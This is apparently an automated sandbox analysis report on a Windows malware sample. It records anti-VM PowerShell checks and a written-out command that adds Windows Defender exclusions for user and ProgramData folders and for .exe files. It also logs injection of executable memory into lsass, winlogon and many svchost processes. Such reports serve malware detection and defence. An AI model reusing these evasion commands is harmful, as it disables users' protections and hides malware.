                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2431393895.000000001C7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>Mi%SystemRoot%\system32\mswsock.dlllemscorlibSystemEnumMAPSReportingTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MpPreferencevalue__DisabledBasicAdvancedSubmitSamplesConsentTypeAlwaysPromptSendSafeSamplesNeverSendSendAllSamplesDayEverydaySundayMondayTuesdayWednesdayThursdayFridaySaturdayNeverScanTypeQuickScanFullScanScanDirectionBothIncomingOutcoming
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                      Source: svchost.exe, 00000037.00000002.3615722610.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>GK2SBZ
                      Source: lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>2/Rzxa
                      Source: svchost.exe, 00000020.00000000.2427459904.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000032.00000000.2461656247.000001CA97800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                      Source: svchost.exe, 00000037.00000000.2497789179.00000205FBA43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>q2/Rzx
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                      Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_17-413
                      Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001E858987D90
                      Source: C:\Windows\System32\dialer.exeCode function: 47_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,47_2_00000001408460F0
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400017EC GetProcessHeap,RtlAllocateHeap,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,17_2_00000001400017EC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762441160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,3_2_00007FF762441160
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001E858987D90
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001E85898D2A4
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 28_2_00007FF72AF21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,28_2_00007FF72AF21160
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000140AE867D90
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000140AE86D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00000195DD5CD2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00000195DD5C7D90
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_000001160CA9D2A4
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_000001160CA97D90
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,45_2_0000000140001160
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00000257E10AD2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00000257E10A7D90
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001F28C937D90
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001F28C93D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000001CA9854D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000001CA98547D90
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001D265317D90
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001D26531D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000254A27DD2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000254A27D7D90
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0000028708E6D2A4
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0000028708E67D90
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000024B87DDD2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000024B87DD7D90
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD40D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000205FD40D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD407D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000205FD407D90
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001A2056AD2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001A2056A7D90
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_0000018EC1F67D90
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_0000018EC1F6D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E0D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000025CE3E0D2A4
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000025CE3E07D90
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell decode and execute
                      Source: Yara matchFile source: amsi64_612.amsi.csv, type: OTHER
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: amsi64_612.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTR
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CA30000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CA60000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: EC0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DCF0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7310000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 87A0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28AF9060000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19D48690000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1A4AA0F0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AEF8F80000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 25B826F0000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12107F90000 protect: page execute and read and write
